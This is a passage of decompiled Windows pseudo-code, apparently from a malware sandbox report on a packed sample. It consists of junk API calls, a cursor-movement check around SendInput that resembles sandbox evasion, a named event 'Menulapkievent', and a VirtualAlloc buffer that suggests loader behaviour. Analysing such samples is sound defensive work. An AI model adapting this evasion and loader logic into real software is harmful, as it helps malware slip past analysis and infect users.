				intOrPtr _t863;
				signed int _t869;
				signed int _t873;
				signed int _t882;
				signed int _t884;
				signed char _t886;
				signed short _t893;
				signed int _t900;
				int _t914;
				struct HDC__* _t918;
				signed short _t923;
				signed int _t927;
				struct HDC__* _t931;
				signed int _t932;
				int _t944;
				int _t950;
				struct HDC__* _t960;
				long _t961;
				struct HDC__* _t968;
				struct HDC__* _t969;
				struct HDC__* _t970;
				struct HDC__* _t971;
				int _t981;
				signed int _t984;
				int _t985;
				struct HDC__* _t986;
				struct HDC__* _t994;
				int _t999;
				struct HWND__* _t1005;
				signed char _t1007;
				signed char _t1010;
				signed int _t1011;
				int _t1014;
				signed int _t1019;
				struct HDC__* _t1020;
				struct HWND__* _t1026;
				int _t1032;
				signed char _t1033;
				signed char _t1037;
				signed short _t1038;
				signed int _t1042;
				struct HDC__* _t1046;
				intOrPtr _t1061;
				struct HDC__* _t1067;
				struct HDC__* _t1068;
				signed int _t1076;
				signed short _t1078;
				int _t1080;
				signed int _t1089;
				DLGTEMPLATE* _t1097;
				int _t1109;
				struct HWND__* _t1114;
				int _t1123;
				void* _t1130;
				signed int _t1131;
				signed int _t1132;
				struct HDC__* _t1136;
				signed short _t1139;
				struct HDC__* _t1140;
				struct HWND__* _t1141;
				signed int _t1142;
				struct HWND__* _t1143;
				void* _t1144;
				struct HDC__* _t1145;
				signed char _t1146;
				struct HDC__* _t1149;
				struct HDC__* _t1150;
				signed char _t1152;
				int _t1160;
				intOrPtr _t1162;
				signed char _t1163;
				signed char _t1165;
				struct HDC__* _t1169;
				struct HWND__* _t1170;
				signed int _t1173;
				signed int _t1174;
				signed int _t1176;
				signed int _t1178;
				signed int _t1181;
				signed char _t1182;
				intOrPtr _t1190;
				signed int _t1203;
				signed int _t1208;
				int _t1213;
				void* _t1217;
				struct HDC__* _t1218;
				signed int _t1219;
				struct HDC__* _t1241;
				signed int _t1243;
				signed int _t1245;
				intOrPtr* _t1248;
				void* _t1253;
				struct HWND__* _t1258;
				signed short _t1260;
				signed char _t1262;
				signed short _t1272;
				void* _t1275;
				struct HDC__* _t1276;
				char _t1279;
				struct HDC__* _t1282;
				signed int _t1283;
				signed int _t1292;
				int _t1295;
				void* _t1301;
				void* _t1315;
				void* _t1317;
				struct HWND__* _t1321;
				signed short _t1325;
				signed int _t1326;
				signed int _t1332;
				signed short _t1335;
				signed int _t1341;
				signed int _t1343;
				signed int _t1346;
				struct HWND__* _t1355;
				signed char _t1356;
				signed int _t1365;
				signed int _t1372;
				signed int _t1373;
				void* _t1376;
				signed int _t1377;
				void* _t1383;
				struct HDC__* _t1384;
				signed int _t1386;
				void* _t1394;
				intOrPtr _t1395;
				struct HDC__* _t1396;
				signed char _t1405;
				intOrPtr _t1412;
				signed int _t1415;
				struct HDC__* _t1419;
				struct HDC__* _t1423;
				struct HDC__* _t1424;
				signed short _t1429;
				struct HWND__* _t1432;
				struct HDC__* _t1436;
				void* _t1438;
				void* _t1439;
				struct HDC__* _t1440;
				signed int _t1444;
				signed int _t1446;
				struct HDC__* _t1447;
				void* _t1449;
				int _t1455;
				struct HDC__* _t1456;
				intOrPtr _t1458;
				signed int _t1459;
				signed short _t1460;
				signed int _t1461;
				void* _t1466;
				struct HDC__* _t1469;
				signed int _t1473;
				int _t1474;
				int _t1475;
				struct HDC__* _t1477;
				int _t1478;
				intOrPtr* _t1479;
				struct HDC__* _t1480;
				struct HDC__* _t1481;
				void* _t1483;
				signed int _t1485;
				struct HDC__* _t1491;
				struct HDC__* _t1492;
				void* _t1493;
				signed short _t1494;
				struct HDC__* _t1495;
				int _t1496;
				struct HDC__* _t1497;
				intOrPtr _t1498;
				signed short _t1501;
				_Unknown_base(*)()* _t1503;
				signed int _t1504;
				struct HINSTANCE__* _t1509;
				struct HWND__* _t1510;
				intOrPtr _t1512;
				signed int _t1513;
				struct HDC__* _t1514;
				struct HDC__* _t1516;
				struct HDC__* _t1517;
				int _t1518;
				signed int _t1522;
				struct HWND__* _t1523;
				void* _t1525;
				intOrPtr* _t1526;
				long long* _t1527;
				void* _t1528;
				void* _t1529;
				void* _t1530;
				void* _t1531;
				void* _t1532;
				void* _t1533;
				void* _t1534;
				void* _t1537;
				void* _t1539;
				void* _t1540;
				void* _t1547;
				void* _t1564;
				long long _t1565;

				_t1564 = __fp0;
				E00432414(0x44cdd6, 0);
				L00434BC0(0x8c68);
				_t1169 =  *0x46aba8; // 0x0
				_t1130 = MessageBoxA;
				_push(0);
				_t1355 = 0;
				if(_t1169 >= 2) {
					L13:
					 *((intOrPtr*)(_t1525 + 0x10)) =  *((intOrPtr*)(_t1525 + 0x8c8c));
					asm("stosd");
					asm("stosd");
					asm("stosd");
					 *(_t1525 + 0x70) = _t1355;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					 *((short*)(_t1525 + 0x47c)) = 0;
					_t1131 = _t1355;
					 *(_t1525 + 0x44) = 1;
					 *(_t1525 + 0x64) = _t1355;
					E004345E0(_t1525 + 0x482, _t1355, 0x206);
					_t1412 =  *((intOrPtr*)(_t1525 + 0x1c));
					_t1526 = _t1525 + 0xc;
					_t1512 = 0xa;
					 *((intOrPtr*)(_t1526 + 0x14)) = _t1512;
					 *((intOrPtr*)(_t1526 + 0x60)) = 0;
					 *((intOrPtr*)(_t1526 + 0x2c)) = 0;
					 *(_t1526 + 0x48) = 0;
					 *((intOrPtr*)(_t1526 + 0x4c)) = 0;
					 *(_t1526 + 0x40) = 0;
					 *((intOrPtr*)(_t1526 + 0x44)) = 0;
					_t1458 = _t1512;
					do {
						_t1356 =  *0x46b100; // 0x80070057
						_t1170 =  *0x46abac; // 0x0
						if(_t1170 -  *0x469388 + _t1412 >=  ~(_t1356 & 0x000000ff)) {
							 *0x46ab74 =  *0x46ab74 + _t1356 -  *0x46ab80;
						}
						SetAbortProc(0, E00408568);
						_t1458 = _t1458 - 1;
					} while (_t1458 != 0);
					GetCursorPos(_t1526 + 0x48);
					 *((intOrPtr*)(_t1526 + 0x18)) = CreateEventA(0, 0, 0, "Menulapkievent");
					_t1547 =  *0x46aba8 - _t1458; // 0x0
					if(_t1547 == 0) {
						SetWindowExtEx(0,  *0x46ab78,  *0x469388, 0);
					} else {
						SetMapMode( *0x46ab80, 7);
					}
					_t639 =  *0x46aba8; // 0x0
					_t1459 =  *(_t1526 + 0x90);
					_t44 = _t639 + 0x46aef0; // 0x46aef0
					_t1513 = _t44;
					asm("cdq");
					_t1173 = 0xfffffffa;
					_t1174 = 0x2b;
					 *(_t1526 + 0x20) = _t1513;
					 *(_t1526 + 0x50) = _t1459 / _t1173;
					 *(_t1526 + 0x3c) =  *(_t1526 + 0x70);
					 *(_t1526 + 0x68) = _t1513 / _t1174;
					L21:
					L21:
					if( *0x46add4 != 0) {
						_t1132 =  *0x46ab98; // 0x0
						_t1131 = _t1132 *  *0x46ab80 - _t1513 +  *0x46ab8c;
						__eflags = _t1131;
					} else {
						 *0x46ab98 =  *0x46ab98 + (_t1131 & 0x000000ff) +  *0x46ab94;
					}
					GetCursorPos(_t1526 + 0x40);
					 *(_t1526 + 0x98) =  *(_t1526 + 0x98) & 0x00000000;
					_t1176 = 6;
					memset(_t1526 + 0x9c, 0, _t1176 << 2);
					_t1526 = _t1526 + 0xc;
					__imp__SendInput(1, _t1526 + 0x9c, 0x1c); // executed
					GetPriorityClass(0);
					_t1514 =  *0x46aba8; // 0x0
					_t1415 =  *0x46ab80; // 0x0
					if( *(_t1526 + 0x48) !=  *(_t1526 + 0x40) ||  *((intOrPtr*)(_t1526 + 0x4c)) !=  *((intOrPtr*)(_t1526 + 0x44))) {
						_t1178 =  *0x46ab78; // 0x8ba69010
						 *0x46ab74 = ( *(_t1526 + 0x74) & 0x000000ff) + 1 + _t1178 *  *0x46abac - (_t1526 + 0x00000478 & 0x000000ff);
						asm("cdq");
						_t1181 = 0x14;
						 *((intOrPtr*)(_t1526 + 0x60)) =  *((intOrPtr*)(_t1526 + 0x60)) + 1;
						_t1365 = (( *0x46b100 & 0x0000ffff) + _t1415 / _t1181 -  *0x46ab78 + _t1514) *  *(_t1526 + 0x58);
						__eflags = _t1365;
						 *(_t1526 + 0x48) =  *(_t1526 + 0x40);
						 *(_t1526 + 0x58) = _t1365;
						 *((intOrPtr*)(_t1526 + 0x4c)) =  *((intOrPtr*)(_t1526 + 0x44));
					} else {
						_t1365 =  *(_t1526 + 0x58);
						if(( *0x46ab84 & 0x000000ff) * _t1459 != 0) {
							 *0x46ab78 =  *0x46ab78 + _t1459;
						}
					}
					_t1182 =  *0x46b100; // 0x80070057
					_t663 =  *0x46ab84; // 0x788
					 *(_t1526 + 0x38) =  *(_t1526 + 0x38) + _t1182 - _t1365 * _t1131 -  *0x46aba4 -  *0x46ab78;
					 *(_t1526 + 0x3c) =  *(_t1526 + 0x3c) +  *((intOrPtr*)(_t1526 + 0x8c)) - _t663 * _t1415 -  *0x46ab9c +  *(_t1526 + 0x50);
					_t1190 =  *((intOrPtr*)(_t1526 + 0x60));
					if(_t1190 != 0) {
						_t1509 =  *(_t1526 + 0x8c8c);
						_t1097 = GlobalAlloc(0x40, 0x200);
						_t1514 =  *0x46aba8; // 0x0
						 *((intOrPtr*)(_t1526 + 0x2c)) =  *((intOrPtr*)(_t1526 + 0x2c)) + 1;
						if(_t1514 != 0 &&  *0x46abac != 0) {
							DialogBoxIndirectParamA(_t1509, _t1097, 0, E00408568, _t1509);
							_t1514 =  *0x46aba8; // 0x0
						}
						_t1415 =  *0x46ab80; // 0x0
						_t1365 =  *(_t1526 + 0x58);
						_t1190 =  *((intOrPtr*)(_t1526 + 0x60));
					}
					_t1460 =  *0x46add4; // 0x0
					if( *(_t1526 + 0x68) -  *0x46aba4 +  *(_t1526 + 0x38) <= _t1415) {
						 *(_t1526 + 0x58) = (( *(_t1526 + 0x10) & 0x0000ffff) - _t1460 +  *0x46ab94) * _t1365;
					}
					_t99 =  &(_t1514->i); // 0x1
					if(_t1190 > _t99) {
						goto L46;
					}
					_t1335 =  *0x46ab84; // 0x788
					asm("cdq");
					_t1504 = 0x2a;
					asm("cdq");
					if( *(_t1526 + 0xc0) / _t1504 +  *(_t1526 + 0x94) / (_t1335 + 0x3f) +  *(_t1526 + 0x74) < _t1131) {
						_t1089 =  *0x46ab8c; // 0x12f8f0
						asm("cdq");
						_t1346 = 0xd;
						 *0x46ab74 =  *0x46ab74 +  ~( *(_t1526 + 0x3c)) - _t1089 *  *0x46b100 / _t1346;
					}
					_t1405 =  *0x46ab90; // 0x0
					if(( *0x46ab78 & 0x0000ffff) == (_t1405 & 0x000000ff)) {
						_t1341 =  *0x46ab9c; // 0x788
						_t1076 = _t1415;
						asm("cdq");
						_t1343 = 0xc;
						_t1371 = _t1076 % _t1343;
						_t1078 =  *0x46ab94; // 0x0
						_t124 = _t1078 + 0x46aef0; // 0x0
						_t1080 = _t124 + ( *0x46aba0 & 0x000000ff) *  *(_t1526 + 0x38) + _t1341 * (_t1526 + 0x478) - _t1076 / _t1343;
						__eflags = _t1080;
						 *0x46ab78 = _t1080;
					} else {
						_t1371 = _t1405 - ( *0x46aba0 & 0x0000ffff) + ( *(_t1526 + 0x10) & 0x000000ff);
						 *0x46ab90 = _t1405 - ( *0x46aba0 & 0x0000ffff) + ( *(_t1526 + 0x10) & 0x000000ff);
					}
					if( *((intOrPtr*)(_t1526 + 0x2c)) > 4) {
						SendMessageA( *0x46abac, 0x405, 0, 0);
						goto L48;
					} else {
						WaitForSingleObject( *(_t1526 + 0x1c),  *(_t1526 + 0x58) + 0xbb5);
						_t128 = _t1526 + 0x14;
						 *_t128 =  *((intOrPtr*)(_t1526 + 0x14)) - 1;
						if( *_t128 == 0) {
							L47:
							L48:
							 *((intOrPtr*)(_t1526 + 0x24)) = 0;
							 *((intOrPtr*)(_t1526 + 0x18)) = E004085EE(0, 0);
							 *(_t1526 + 0x20) =  *0x46ab80 & 0x0000ffff;
							 *((intOrPtr*)(_t1526 + 0x8c88)) = 3;
							E0040598C(_t1526 + 0x20,  *_t674, _t1526 + 0x20);
							 *(_t1526 + 0x20) =  *0x46ab88 & 0x0000ffff;
							E0040598C(_t1526 + 0x20,  *(_t1526 + 0x1c), _t1526 + 0x20);
							 *(_t1526 + 0x20) = _t1131 & 0x0000ffff;
							E0040598C(_t1526 + 0x20,  *(_t1526 + 0x1c), _t1526 + 0x20);
							__eflags =  *0x46add4;
							if( *0x46add4 == 0) {
								_t1067 =  *0x46ab80; // 0x0
								_t1068 = _t1067 -  *0x46aba0;
								__eflags = _t1068;
								 *0x46aba4 = _t1068;
							}
							L00408BCC(_t1526 + 0x18, _t1526 + 0x34,  *((intOrPtr*)( *((intOrPtr*)(_t1526 + 0x18)))));
							GetSystemMetrics( *0x46ab78);
							 *(_t1526 + 0x8c80) =  *(_t1526 + 0x8c80) | 0xffffffff;
							E00408915(_t1526 + 0x18);
							E004305CB( *((intOrPtr*)(_t1526 + 0x18)));
							asm("stosd");
							asm("stosd");
							asm("stosd");
							 *(_t1526 + 0x74) = 0;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							 *((intOrPtr*)(_t1526 + 0xb8)) = 0;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							 *_t1526 = 0x206;
							_push(0);
							_push(_t1526 + 0x27a);
							 *(_t1526 + 0x20) =  *(_t1526 + 0x8c90);
							E004345E0();
							_t1419 =  *0x46ab80; // 0x0
							asm("movd xmm0, eax");
							asm("cvtdq2pd xmm0, xmm0");
							_t1527 = _t1526 + 0xc;
							asm("addsd xmm0, [eax*8+0x44d920]");
							asm("movsd [esp+0x48], xmm0");
							asm("movd xmm0, edi");
							asm("cvtdq2pd xmm0, xmm0");
							L00434CA0(_t1371, _t1564);
							_t1461 =  *0x46aba0; // 0x210
							_t696 =  *0x46ab8c; // 0x12f8f0
							asm("cdq");
							_t169 = _t1461 + 0x3a; // 0x24a
							_t1203 = _t169;
							_t1372 = _t696 % _t1203;
							asm("movapd xmm2, xmm0");
							asm("movd xmm1, eax");
							asm("cvtdq2pd xmm1, xmm1");
							asm("addsd xmm2, xmm1");
							asm("movd xmm0, eax");
							asm("cvtdq2pd xmm0, xmm0");
							asm("addsd xmm2, [0x44d910]");
							asm("addsd xmm2, [0x44d918]");
							asm("subsd xmm2, xmm0");
							asm("movsd xmm0, [esp+0x48]");
							asm("subsd xmm0, xmm2");
							asm("movsd [esp+0x48], xmm0");
							_t1565 =  *((long long*)(_t1527 + 0x48));
							_t699 = L00434C26();
							_t1136 =  *0x46ab9c; // 0x788
							 *(_t1527 + 0x38) =  *(_t1527 + 0x38) & 0x00000000;
							 *0x46aba4 = _t699;
							__eflags = _t1136;
							if(_t1136 <= 0) {
								L77:
								 *(_t1527 + 0x20) =  *(_t1527 + 0x20) & 0x00000000;
								 *0x46add4 = _t1461 * _t699 *  *0x46ab74 * _t1419 + 2;
								 *((char*)(_t1527 + 0x17c)) = 0;
								E004345E0(_t1527 + 0x175, 0, 0xff);
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t1528 = _t1527 + 0xc;
								_t707 =  *0x46abac; // 0x0
								_t1466 = 0;
								_t1139 = _t1136 - ( *(_t1527 + 0xc8) & 0x000000ff) - ( *0x46ab88 & 0x0000ffff) + _t707;
								GetClassNameA(_t707, 0x46b7a0, 0x20);
								_t1423 =  *0x46ab80; // 0x0
								_t1424 = _t1423 + 0x10;
								__eflags = _t1424;
								do {
									GetClassNameA( *0x46abac, 0x46b7c4, 0x20);
									_t710 =  *0x46aba4; // 0x0
									_t1466 = _t1466 + _t710 *  *0x46ab98 *  *0x46ab88 + 0x60;
									_t1424 = _t1424 - 1;
									__eflags = _t1424;
								} while (_t1424 != 0);
								asm("movd xmm0, dword [esp+0xa0]");
								asm("cvtdq2ps xmm0, xmm0");
								_push(_t1203);
								asm("cvtps2pd xmm0, xmm0");
								_push(_t1203);
								asm("movsd [esp], xmm0");
								E00434850(_t1203, _t1424);
								 *((long long*)(_t1528 + 0x88)) = _t1565;
								asm("movsd xmm2, [esp+0x88]");
								asm("movd xmm0, eax");
								asm("cvtdq2pd xmm0, xmm0");
								asm("cvtpd2ps xmm2, xmm2");
								asm("addsd xmm0, [eax*8+0x44d920]");
								asm("cvtpd2ps xmm1, xmm0");
								asm("movd xmm0, eax");
								asm("cvtdq2ps xmm0, xmm0");
								asm("mulss xmm1, xmm2");
								_push(9);
								asm("mulss xmm1, xmm0");
								asm("movd xmm0, eax");
								asm("cvtdq2ps xmm0, xmm0");
								asm("addss xmm1, xmm0");
								asm("cvttss2si eax, xmm1");
								 *0x469388 = (_t1139 & 0x0000ffff) *  *(_t1528 + 0x78);
								_t295 = _t1466 + 0x10; // 0x10
								 *(_t1528 + 0x6c) = _t295 << 4;
								 *((short*)(_t1528 + 0xb8)) = 0;
								memset(_t1528 + 0xba, 0, 0 << 2);
								_t1529 = _t1528 + 0xc;
								_t1208 =  *0x46ab84; // 0x788
								asm("stosw");
								_t726 =  *0x46aba8; // 0x0
								 *((intOrPtr*)(_t1529 + 0x18)) = (_t1208 * _t726 << 0xc) + 0x40;
								_t727 = DescribePixelFormat(_t726, 5, 0x28, _t1529 + 0xb4);
								_t1213 =  *0x469388; // 0x0
								_t1140 =  *0x46aba8; // 0x0
								__eflags = _t727;
								_t1214 =  ==  ? _t1140 : _t1213;
								 *0x469388 =  ==  ? _t1140 : _t1213;
								 *0x46ab78 = ( *0x46b100 & 0x000000ff) + _t1529 + 0x170 + ( *0x46aba0 & 0x0000ffff) -  *0x46aba4;
								 *(_t1529 + 0x27c) = _t1140;
								E004345E0(_t1529 + 0x275, 0, 0x103);
								_t1530 = _t1529 + 0xc;
								_t1217 = 0;
								__eflags = 0;
								do {
									_t733 =  *((intOrPtr*)(_t1530 + _t1217 + 0x270));
									 *((char*)(_t1530 + _t1217 + 0x878)) = _t733;
									_t1217 = _t1217 + 1;
									__eflags = _t733;
								} while (_t733 != 0);
								 *(_t1530 + 0x484) = _t1140;
								E004345E0(_t1530 + 0x47d, 0, 0x103);
								_t737 = E00434710(_t1530 + 0x884, 0x2f);
								_t1531 = _t1530 + 0x14;
								_t1373 = _t737;
								_t738 = 0;
								__eflags = 0;
								do {
									_t1218 =  *((intOrPtr*)(_t1531 + _t738 + 0x478));
									 *((char*)(_t1531 + _t738 + 0x270)) = _t1218;
									_t738 = _t738 + 1;
									__eflags = _t1218;
								} while (_t1218 != 0);
								_t1141 =  *0x46abac; // 0x0
								__eflags = _t1141;
								if(_t1141 == 0) {
									L90:
									_t1469 = 0x16;
									while(1) {
										 *(_t1531 + 0xb4) =  *(_t1531 + 0xb4) & 0x00000000;
										_t1219 = 6;
										memset(_t1531 + 0xb8, 0, _t1219 << 2);
										_t1531 = _t1531 + 0xc;
										_t741 =  *0x46b7ec; // 0x0
										__eflags = _t741 & 0x00000001;
										if((_t741 & 0x00000001) == 0) {
											_t968 = _t741 | 0x00000001;
											__eflags = _t968;
											 *0x46b7ec = _t968;
											_t969 =  *0x46aba8; // 0x0
											 *0x46b7e8 = _t969;
										}
										SetScrollInfo(_t1141, 1, _t1531 + 0xb8, 1);
										GetScrollInfo( *0x46abac, 1, _t1531 + 0xb4);
										_t746 =  *0x46b7e8; // 0x0
										__eflags =  *((intOrPtr*)(_t1531 + 0xc8)) - _t746;
										if( *((intOrPtr*)(_t1531 + 0xc8)) != _t746) {
											ScrollWindow( *0x46abac, 0, (_t746 -  *((intOrPtr*)(_t1531 + 0xc8))) *  *0x46938c, 0, 0);
											__eflags =  *0x46aba8;
											if( *0x46aba8 != 0) {
												UpdateWindow( *0x46ab88);
											}
										}
										 *0x46add8 = 5;
										_t1469 = _t1469 - 1;
										__eflags = _t1469;
										if(_t1469 == 0) {
											break;
										}
										_t1141 =  *0x46abac; // 0x0
									}
									GetDialogBaseUnits();
									_t748 =  *0x46abac; // 0x0
									__eflags = _t748 +  *0x469388;
									if(_t748 +  *0x469388 == 0) {
										_t750 =  *0x46ab74; // 0x0
										_t1142 =  *(_t1531 + 0x20);
										 *0x469388 =  ~_t750;
									} else {
										_t1142 =  *0x46ab80 & 0x000000ff;
									}
									 *((intOrPtr*)(_t1531 + 0x5c)) = 0;
									 *((intOrPtr*)(_t1531 + 0x50)) = E004085EE(0, 0);
									 *(_t1531 + 0x20) =  *0x46ab9c & 0x0000ffff;
									 *((intOrPtr*)(_t1531 + 0x8c88)) = 6;
									E0040598C(_t1531 + 0x58,  *_t753, _t1531 + 0x20);
									_t755 = VirtualAlloc(0,  *(_t1531 + 0x70), 0x3000,  *(_t1531 + 0x18));
									__eflags =  *0x46ab98;
									_t1429 =  *0x469388; // 0x0
									 *0x46ab94 = _t755;
									if( *0x46ab98 == 0) {
										_t1373 = (_t1531 + 0x00000170 & 0x0000ffff) - (_t1429 & 0x0000ffff) - _t1142;
										__eflags = _t1373;
										 *0x46ab98 = _t1373;
									}
									 *(_t1531 + 0x20) =  *0x46ab90 & 0x0000ffff;
									_t1473 = (_t755 & 0x0000ffff) + ( *0x46ab78 & 0x0000ffff) -  *0x46ab84 - _t1429;
									E0040598C(_t1531 + 0x58,  *(_t1531 + 0x54), _t1531 + 0x20);
									 *(_t1531 + 0x20) =  *0x46ab94 & 0x0000ffff;
									E0040598C(_t1531 + 0x58,  *(_t1531 + 0x54), _t1531 + 0x20);
									__eflags =  *(_t1531 + 0x54);
									if( *(_t1531 + 0x54) != 0) {
										_t1492 = _t1473 *  *0x46ab90;
										__eflags = _t1492;
										 *0x46ab98 = _t1492;
									}
									L00408BCC(_t1531 + 0x50, _t1531 + 0x34,  *((intOrPtr*)( *((intOrPtr*)(_t1531 + 0x50)))));
									 *(_t1531 + 0x8c80) =  *(_t1531 + 0x8c80) | 0xffffffff;
									E00408915(_t1531 + 0x50);
									E004305CB( *((intOrPtr*)(_t1531 + 0x50)));
									_t1474 =  *0x46aba8; // 0x0
									_t1143 =  *0x46ab88; // 0x0
									_t768 = 9;
									memset(_t1531 + 0xb4, 0, _t768 << 2);
									_t1532 = _t1531 + 0xc;
									_t771 =  *0x469390; // 0xffffff
									 *(_t1532 + 0xb4) = 0x24;
									 *(_t1532 + 0xb8) = _t1143;
									 *((intOrPtr*)(_t1532 + 0xc4)) = 0x46b7f0;
									 *(_t1532 + 0xc0) = _t771;
									 *(_t1532 + 0xc8) = 1;
									__eflags = _t1474;
									if(_t1474 != 0) {
										_t960 = ChooseColorA(_t1532 + 0xb4);
										__eflags = _t960;
										if(_t960 != 0) {
											_t961 =  *(_t1532 + 0xc0);
											 *0x469390 = _t961;
											SendMessageA(_t1143, 0x443, 0, _t961);
											SendMessageA(_t1143, 0x2001, 0,  *0x469390);
										}
										_t1474 =  *0x46aba8; // 0x0
									}
									 *((intOrPtr*)(_t1532 + 0xc4)) = 3;
									 *(_t1532 + 0xd8) = _t1474;
									SendMessageA( *(_t1532 + 0x3c), 0x1306, _t1474, _t1532 + 0xb4);
									GetClientRect( *(_t1532 + 0x24), _t1532 + 0x70);
									_t1432 =  *(_t1532 + 0x170 + _t1474 * 4);
									MoveWindow(_t1432,  *((intOrPtr*)(_t1532 + 0x80)) + 0xa,  *((intOrPtr*)(_t1532 + 0x80)) + 0x1e,  *((intOrPtr*)(_t1532 + 0x80)) + 0xffffffe9,  *((intOrPtr*)(_t1532 + 0x7c)) + 0xffffff9e, 1);
									_t1144 = ShowWindow;
									__eflags = _t1474;
									if(_t1474 < 0) {
										L112:
										ShowWindow(_t1432, 5); // executed
										SetFocus(_t1432);
										SendDlgItemMessageA( *(_t1532 + 0x30),  *0x46ab74, 0x401, 1,  *0x469388);
										_t1475 =  *0x46aba8; // 0x0
										 *((char*)(_t1532 + 0x27c)) = 0;
										E004345E0(_t1532 + 0x275, 0, 0x103);
										_t1533 = _t1532 + 0xc;
										__eflags = _t1475;
										if(_t1475 != 0) {
											MessageBoxA( *(_t1533 + 0x17c + _t1475 * 4), "Do you want to save it ?", 0x46acd0, 0x21);
										}
										_t790 = SendMessageA( *(_t1533 + 0x20), 0x1308, _t1475, 0);
										__eflags = _t790;
										if(_t790 == 0) {
											_t1145 = 0;
											__eflags =  *0x46abac - _t1145; // 0x0
											if(__eflags != 0) {
												MessageBoxA(0, "Can not Close the file", 0x46acd0, 0);
											}
											goto L132;
										} else {
											__eflags = _t1475;
											if(__eflags <= 0) {
												L119:
												if(__eflags != 0) {
													L122:
													_t1446 = _t1475;
													__eflags = _t1475 - _t1475;
													if(_t1475 > _t1475) {
														L126:
														DestroyWindow( *(_t1533 + 0x170 + _t1475 * 4));
														_push(5);
														__eflags = _t1475;
														if(_t1475 != 0) {
															ShowWindow( *(_t1533 + 0x170 + _t1475 * 4), ??);
															_t1145 = 0;
															__eflags = 0;
															_push(0);
															_t417 = _t1475 - 1; // -1
														} else {
															ShowWindow( *(_t1533 + 0x174), ??);
															_t1145 = 0;
															_push(0);
															_push(0);
														}
														SendMessageA( *(_t1533 + 0x20), 0x1330, ??, ??);
														L132:
														 *(_t1533 + 0x20) =  *(_t1533 + 0x8c8c);
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														_t1477 =  *(_t1533 + 0x9c) *  *(_t1533 + 0xb8);
														__eflags = _t1477;
														_push(9);
														_t1516 = _t1145;
														 *(_t1533 + 0x58) = _t1516;
														_t1436 = 0;
														 *(_t1533 + 0x40) = 5;
														 *((intOrPtr*)(_t1533 + 0x44)) = 0x36;
														 *(_t1533 + 0x34) = _t1145;
														do {
															_t796 =  *0x46ab94; // 0x0
															 *0x46addc = _t796;
															 *(_t1533 + 0x18) = _t1145;
															 *(_t1533 + 0x1c) = _t1145;
															 *(_t1533 + 0x18) = E0040856D(_t1145, _t1373, _t1436);
															 *(_t1533 + 0x8c88) = 7;
															E0040608B(_t1533 + 0x20, _t1533 + 0x8c, _t1533 + 0x40);
															_t801 =  *0x46ab84; // 0x788
															 *(_t1533 + 0x30) = _t801;
															E0040608B(_t1533 + 0x20, _t1533 + 0xf4, _t1533 + 0x30);
															 *0x46ab98 = _t1477;
															E004088F4(_t1533 + 0x18);
															SetStretchBltMode(_t1145, 4);
															 *(_t1533 + 0x8c80) =  *(_t1533 + 0x8c80) | 0xffffffff;
															E004060C1(_t1145);
															_t1436 = _t1436 - 1;
															__eflags = _t1436;
														} while (_t1436 != 0);
														_t1146 =  *0x46ab9c; // 0x788
														_t1149 =  *0x46add4 + (_t1146 + 1) * 3;
														 *(_t1533 + 0x1c) = _t1149;
														SetAbortProc(_t1436, E00408568);
														 *(_t1533 + 0xb4) =  *(_t1533 + 0xb4) & _t1436;
														asm("stosd");
														asm("stosd");
														asm("stosd");
														DrawFrameControl( *0x46aba8, _t1533 + 0xbc, 4, 0x4210);
														 *(_t1533 + 0x4c) = 0;
														_t1478 = E004085EE(0, 0);
														 *(_t1533 + 0x40) = _t1478;
														_t1438 = 0;
														 *(_t1533 + 0x8c80) = 8;
														__eflags = _t1149;
														if(_t1149 <= 0) {
															L140:
															LoadImageA( *(_t1533 + 0x8ca0),  *0x469388 & 0x0000ffff, 0, 0, 0, 0);
															_t1479 =  *_t1478;
															_t1439 = 0;
															__eflags = _t1149;
															if(_t1149 <= 0) {
																L142:
																 *(_t1533 + 0x48) =  *(_t1533 + 0x48) & 0x00000000;
																 *(_t1533 + 0x4c) =  *(_t1533 + 0x4c) & 0x00000000;
																 *(_t1533 + 0x48) = E00408598(_t1149, _t1373, _t1439);
																_t817 = 9;
																 *(_t1533 + 0x8c80) = _t817;
																 *(_t1533 + 0x38) = 0x7a;
																 *((intOrPtr*)(_t1533 + 0x3c)) = 0x30;
																L00405FE9(_t1533 + 0x50, _t1533 + 0x8c, _t1533 + 0x30);
																_t1480 =  *0x46ab80; // 0x0
																asm("cdq");
																_t484 = _t1480 + 0x56; // 0x56
																_t1241 =  *0x46add4; // 0x0
																__eflags =  *(_t1533 + 0x78) / _t484 *  *0x46aba8;
																_t1517 =  !=  ?  *0x46aba4 : _t1516;
																_t824 =  *0x46addc; // 0x0
																 *(_t1533 + 0x2c) = _t824;
																_t825 =  *0x46ab84; // 0x788
																_t1243 = _t1241 + 0x7c + _t1480;
																 *(_t1533 + 0x170) = _t825;
																_t826 = 0;
																_t1440 = 0;
																_t1481 = 0;
																 *(_t1533 + 0x58) = _t1517;
																 *(_t1533 + 0x38) = _t1243;
																 *((intOrPtr*)(_t1533 + 0x10)) = 0;
																__eflags = _t1149;
																if(_t1149 <= 0) {
																	L169:
																	_t827 =  *0x46aba0; // 0x210
																	 *(_t1533 + 0x34) = _t827;
																	_t1244 = _t1533 + 0x50;
																	 *(_t1533 + 0x38) = _t1517;
																	L00405FE9(_t1533 + 0x50, _t1533 + 0x8c, _t1533 + 0x30);
																	__eflags =  *0x46aba8 - 1;
																	if( *0x46aba8 != 1) {
																		_t869 =  *0x46addc; // 0x0
																		_t1244 = _t1533 + 0x8c8c;
																		 *((intOrPtr*)(_t869 + 1)) = _t1533 + 0x8c8c;
																	}
																	asm("movd xmm0, dword [0x46ab98]");
																	asm("cvtdq2pd xmm0, xmm0");
																	E00435660(_t1244, _t1565);
																	asm("movd xmm1, eax");
																	_t833 =  *0x46abac; // 0x0
																	asm("cdq");
																	_t1245 = 0x1e;
																	__eflags = _t833 % _t1245;
																	asm("cvtdq2pd xmm1, xmm1");
																	asm("movapd xmm2, xmm0");
																	asm("movd xmm0, dword [0x46b100]");
																	asm("mulsd xmm2, xmm1");
																	asm("cvtdq2pd xmm0, xmm0");
																	asm("addsd xmm2, [0x44d918]");
																	asm("movd xmm1, eax");
